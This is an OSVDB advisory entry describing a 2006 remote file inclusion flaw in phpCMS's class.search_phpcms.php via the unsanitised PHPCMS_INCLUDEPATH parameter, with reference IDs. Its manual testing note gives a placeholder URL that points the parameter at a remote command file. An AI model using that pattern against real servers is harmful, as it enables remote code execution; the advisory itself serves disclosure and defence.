phpCMS include/class.search_phpcms.php PHPCMS_INCLUDEPATH Variable Remote File Inclusion

2006-06-12T06:34:10
ID OSVDB:26395
Type osvdb
Reporter Federico Fazzi(federico@autistici.org)
Modified 2006-06-12T06:34:10

Description

Vulnerability Description

phpCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to class.search_phpcms.php not properly sanitizing user input supplied to the 'PHPCMS_INCLUDEPATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

phpCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to class.search_phpcms.php not properly sanitizing user input supplied to the 'PHPCMS_INCLUDEPATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]

References:

Vendor URL: http://www.phpcms.de/ Secunia Advisory ID:20573 Related OSVDB ID: 26390 Related OSVDB ID: 26391 Related OSVDB ID: 26394 Related OSVDB ID: 26392 Related OSVDB ID: 26389 Related OSVDB ID: 26393 Related OSVDB ID: 26396 Related OSVDB ID: 26388 Related OSVDB ID: 26397 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0208.html FrSIRT Advisory: ADV-2006-2302 CVE-2006-3019 Bugtraq ID: 21768